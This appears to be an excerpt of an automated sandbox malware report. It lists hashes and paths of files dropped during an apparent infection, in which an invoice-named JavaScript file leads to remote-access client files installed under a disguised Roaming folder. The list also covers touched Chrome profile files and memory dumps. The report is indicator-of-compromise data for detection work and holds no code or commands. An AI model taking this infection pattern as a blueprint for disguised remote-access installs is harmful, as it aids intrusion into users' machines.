| SHA1 | 0d5e6a0b9751cb8ef7e0ac1413e9247282d6fea9 |
| SHA256 | 9dc418de524935dbdf2bac08a6628f9dd24c5ec0ad21c01b4049dba444e6e3b2 |
| SHA512 | d957236f0c9eb7f52b043999695907ddf5c3615faea9f702504addb02bc6c053114523a9b4a0fc9bf4625bc5c8a5d2d3a34901f1195511263aa9395bedb6af8e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1b2250c753297dd79d2a75fd61756788 |
| SHA1 | d0d6ab98c3545b98f16fc912dfe9f0b1884d5726 |
| SHA256 | 7d2134eb37d01077748bf6a147d84b5cf9cf337aac772fcba1b00706d29e32c0 |
| SHA512 | be2767510449cce297fc09365732043f5c111b52fc661fb2fd00025225423fbc0e63fc760ba2d7392712b75ac7d0b890c65a7d1126f477f12c3d188781f9ce86 |
C:\Users\Admin\Downloads\BILL63351.js
| MD5 | 55a8424c9605e6740e33c7f6f265e18e |
| SHA1 | 8be8f6e01c8210441eec37492d0ec1dd0a1cf0ef |
| SHA256 | 70c56698865a3a31045402db6e4519df4aa27c8b356a6e16c3ed2bd32ef74f7c |
| SHA512 | 1df2aa8d6c5b7ea7772e2940f6bf3eb2f4992ee5c8fe3d8ee3651312ef6384a3f59c8e893e6e5e1e7708cecb029ef731097023ba4be5ad9c91e5e04e3a4a4881 |
memory/4420-132-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp
memory/4420-133-0x00000261DB650000-0x00000261DB672000-memory.dmp
memory/4420-134-0x00000261DB730000-0x00000261DB740000-memory.dmp
memory/4420-135-0x00000261DB730000-0x00000261DB740000-memory.dmp
memory/4420-138-0x00000261DB840000-0x00000261DB8B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4w03yg4.ip3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4420-153-0x00000261DB730000-0x00000261DB740000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 806e07e088867c60cdbb89582f71d806 |
| SHA1 | 59371b98d0ab9a41b365a596bbffbe0a34645fdb |
| SHA256 | 7e91a5b7ed5f20ef06886f0f8c76a1a974d4477b8d8768f35b39ede05215e7ea |
| SHA512 | 4412c700dd93f5558945f921402f79a41a5599ce235875822bb01d8cf5f5a2b712aaa3b4e2bf6dfe633d27aaf0ecaa13c036db12591de9fd04c7945bb59ba6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0ec503af8195e2649d252877624684e6 |
| SHA1 | 5acdb69ca4e31d8d8f60a0ef8868d7cd008504e8 |
| SHA256 | f09a2d6c87885efe18ae53c52e19c111537d483262c68dce254250101fdf3570 |
| SHA512 | cab05d34351fc84b558027eac47486f1d38b90f72f5b7d81f4a1114061ae8a2ac865110b36103690f9a48c03d54841b06159379bdeda73da49dde0f0cbf36b5d |
memory/4420-189-0x00000261DB6F0000-0x00000261DB6FA000-memory.dmp
memory/4420-190-0x00000261DB9C0000-0x00000261DB9D2000-memory.dmp
C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe
| MD5 | c4f1b50e3111d29774f7525039ff7086 |
| SHA1 | 57539c95cba0986ec8df0fcdea433e7c71b724c6 |
| SHA256 | 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d |
| SHA512 | 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5 |
C:\Users\Admin\AppData\Roaming\DIVX911\PCICL32.dll
| MD5 | 83373fe3096a4f8ef973ba189eba914a |
| SHA1 | b00b0a2e94f9dc5270ed8ba9ae2db36cfbe15992 |
| SHA256 | bbdff5bc76d68730b4d9d9e2015ca149189cb2484067271be81acff40975b2f2 |
| SHA512 | 02d4096933432984ee29df353e139d72dbc69e4dc64731a8cbc06d100550f49793ad9392029df83e164712b9d3105479c56a4a98274e92272a32537e0baf2b06 |
C:\Users\Admin\AppData\Roaming\DIVX911\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\Roaming\DIVX911\MSVCR100.dll
| MD5 | ff6694101775f777962422e97ebced2d |
| SHA1 | 6e418a9c248620f2449a62d11a6511fae02c6659 |
| SHA256 | 29e44dcbc682943eff80e99c1144177a02e4c5e62ab3f58bf0aa519e5da30048 |
| SHA512 | 00d9e099cfc40b92b0934b81b15ca18a0f9c8cde2a02067442fa785c6f32a3ccbeef84ec1dc9b7a6a30aa90501adb42cc973bd51587e387bd9019569200dc65e |
\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll
| MD5 | 7b08bbcd3175294954a12c84ec3ac71e |
| SHA1 | 7c68bc2c658e655ae249f3c8f84299b3ff561b39 |
| SHA256 | 322588b9b2ba33653652b239f9ae79581cd9963a7f97281463ef9aa786242726 |
| SHA512 | aa9196c4ccc79cb9ca28db00b7627041e4b1b0f732c8b3483187d4116b7d3a52164e28462332d891bfcee309e6f4182c2abe7b4e49cfa48b3701d30b7cebef15 |
\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll
| MD5 | 386d863777748ba378aab6a458e80c80 |
| SHA1 | 55b314039e7a23a65379b185683bb97adb11cc1c |
| SHA256 | 8dc19181afca2de010fa1868908f2c6b57601d9a6cb2a87b5ac14272a6c99a6a |
| SHA512 | 18f5916e80cac5e25ff67d21e6bac7ae017fbbc07e0a798ecd1f99eb3aa02d38ac0cb2463b7edff18af2964b22107a2e4ee35560e07c160b4f8277c0e1c568eb |
\Users\Admin\AppData\Roaming\DIVX911\PCICHEK.DLL
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
\Users\Admin\AppData\Roaming\DIVX911\PCICL32.DLL
| MD5 | 06172470b8d2c5ff80c0edf79ddd1a8d |
| SHA1 | e9582cea9e2c5d458eba8e13839fba8a9fb04c83 |
| SHA256 | 704dde3e33fa644b783b88c6ff39f0a4ae0cf682b4fefda481a2c10dd7018240 |
| SHA512 | d4f98f3ce21b307eedb5175925f8da8f125fc5d030d9e04f349fa72677b6dcfe719933c80b27ff09dbe84889e6b262c1ecd83219f9f7fca6467310ab111783f4 |
C:\Users\Admin\AppData\Roaming\DIVX911\client32.ini
| MD5 | 5d5a682d300dd44ec669829d77790b31 |
| SHA1 | 9a124709f1a17f18b61179bfed6797df13e387a2 |
| SHA256 | 22f3be353ce99ddc16179f0280936fd2626b949efc3dacf0d23c085a98503ec8 |
| SHA512 | beff890c9e59d2033a15eda015db137da44ca77a7361f8b1a1ea76a6138806c898f9eac8a7a794ca0dc32e1f3c5e5bd8058a52164652d015df02305786f407e7 |
C:\Users\Admin\AppData\Roaming\DIVX911\NSM.LIC
| MD5 | 1b41e64c60ca9dfadeb063cd822ab089 |
| SHA1 | abfcd51bb120a7eae5bbd9a99624e4abe0c9139d |
| SHA256 | f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d |
| SHA512 | c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4 |
\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL
| MD5 | c54a2021124656cbc29132c7a86aa527 |
| SHA1 | e1bcacb9f753d914156fdcb84ee40eb74fef3493 |
| SHA256 | 8317d0e55e6efa2a09e657e13a3e3e0e56358e93aa5435ebc8585adcc1d20c0c |
| SHA512 | db71ac7dcdc60151bec66028fd6f23c0300a6e970be20c7432d92e525c52135e03652f651f146b939718570241052959b23eecdeccee2b53892bacb49b8a37b9 |
C:\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
memory/4420-265-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008
| MD5 | 09e5f289ad49d7ae5e9d81eb822e5a84 |
| SHA1 | 32155fdc11993875e0a78d5614fc6a94ed446209 |
| SHA256 | f787b54dc751a5ffe844f85cdd3cdf2b7af7c8c8cc03f83d289c063ec6c145a9 |
| SHA512 | d1396bc37988182e1aa9493aa368de335031924ff6df27aea352ac1519f9d4d56275da0442041d4d95900e4bf1538e84b1920dc8fab8ea822c64d10e024c2988 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | c7ab521a1a8b1c3649d2cd4f0e4debcc |
| SHA1 | 727747ec6061a9b02c796cbc3008fccedb6fbd56 |
| SHA256 | 9f51c04dfb4746b080a7ce95c55e5197ea16f8fcd7b3afdcca238500b28c15a9 |
| SHA512 | e851b84e79590d168ce8744d10227bcad4b31deafd0f3058ebf71aab2d93d8ce781e2248bc117893df0dd5eb3998be3a0e224b640b4198b59a58df1819384307 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
| MD5 | be2b5c9f5f52af8ffc161d6a3d6cbe8a |
| SHA1 | 1c0365805d7e013046001223184af6f1a0e4dd10 |
| SHA256 | 8530583320290fa3ead55ee907a52cb3c10e2e39aaa779744fbdeb4afe4d6086 |
| SHA512 | f3bbb7068cb70597b3c9db7cec85eb775d1f275370593dd3760ad75549b03d90f4faec07a481a561521b1797d0f0e1ec9138dd7915b08fc1c21b1eab7e315c30 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
| MD5 | c15d33a9508923be839d315a999ab9c7 |
| SHA1 | d17f6e786a1464e13d4ec8e842f4eb121b103842 |
| SHA256 | 65c99d3b9f1a1b905046e30d00a97f2d4d605e565c32917e7a89a35926e04b98 |
| SHA512 | 959490e7ae26d4821170482d302e8772dd641ffbbe08cfee47f3aa2d7b1126dccd6dec5f1448ca71a4a8602981966ef8790ae0077429857367a33718b5097d06 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
| MD5 | de69cf9e514df447d1b0bb16f49d2457 |
| SHA1 | 2ac78601179c3a63ba3f3f3081556b12ddcaf655 |
| SHA256 | c447dd7677b419db7b21dbdfc6277c7816a913ffda76fd2e52702df538de0e49 |
| SHA512 | 4aebb7e54d88827d4a02808f04901c0d09b756c518202b056a6c0f664948f5585221d16967f546e064187c6545acef15d59b68d0a7a59897bd899d3e9dda37b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
| MD5 | 716309aab2bca045f9627f63ad79d0bf |
| SHA1 | 38804233a29aaf975d557fe14e762c627bef76e0 |
| SHA256 | 115f6a626ca115d4ad5581b59275327e0e860b30330a52b0f785561332dd2429 |
| SHA512 | adb0bc6cb9b230eda5dac7396a94a9a4dba9c8ba0b2eb73f5f21a20c3ca3d14651420bc6a17e67a71b5bba624f5a4e92d55cbbb898985dcca838184f6dfb2b15 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | e1b3b5908c9cf23dfb2b9c52b9a023ab |
| SHA1 | fcd4136085f2a03481d9958cc6793a5ed98e714c |
| SHA256 | 918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537 |
| SHA512 | b2da7ef768385707afed62ca1f178efc6aa14519762e3f270129b3afee4d3782cb991e6fa66b3b08a2f81ff7caba0b4c34c726d952198b2ac4a784b36eb2a828 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 31c90b650941006596113ed54eb34a1f |
| SHA1 | 138d1783ddfb7ab2e830cebf13b866a45598b435 |
| SHA256 | b0f4baa1a6c653d8216217131c6996f6db4784d559c3f5f0c897f237035df6bf |
| SHA512 | 018168af1ff5a77dd062e13bfdb1d183a6f9b1e967b7fd362c7cfd1402c73aad5e87cba01777a0b635c7125f3f06320b466e161c5e6e51c1f40c3a9b19a353ce |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5817d8.TMP
| MD5 | e4f64499f2558b0945f24c5362e7c6b9 |
| SHA1 | 341fbdd120b6be61e7bc711fd300b52e2826b8bf |
| SHA256 | c473fc3511081d64033e12d40a500d45b4763cfb74fcbbaf3b0f0885eb1f5ed2 |
| SHA512 | 01a7c3e210c9b51816e2146257dd4bc08ea374fce2999d5dfe5c70ac970720679a50952d6920e831523a6e473bc0db98b4641837622b25c81114f884a0da2f5b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e
| MD5 | dcffbaaf426e060aec2ec1b9b51b5c87 |
| SHA1 | 7ed51b9c9845dc07e6d3b2fbe36713b36183c301 |
| SHA256 | d0691984d70cd4b592cb909abb24dd27f123c8b38c79da1c7b3f44871f008a78 |
| SHA512 | 7d659e92a4976adab5fdb3ae7aec2908274f3580e3d8c2655d369214e080bef1e95d59b66656e1650c02f9c20cde2705ba8fd02fb4b7c0b58fa54d3bb3ac67d0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a25fa7992a6d9d231a7512480cfd4a40 |
| SHA1 | 83e90f062f0f5a91030d430d2c04a522f9fcbd47 |
| SHA256 | bc0a753e402917ff1609207e7db2f7b874a6ffb9956283ad3e6f8858c31b4fc1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 849ff2f19c7ff2a6fbdb4f33f645e5b1 |
| SHA1 | 79ea2a55f6fc8cab8755f9cc7289a09bfc0e3e2a |
| SHA256 | cd91a528196f8a4b701c23a81b4efdad52ab8956e33b468504e6853975c598fe |
| SHA512 | 71980f6f41c0ef3dd9b144552375ac367fb4053e8d6a2f9babda9fb212e771173d657dbe725267a8b58299f1565095c9a6a3a029d06e1937a840da704da6c22a |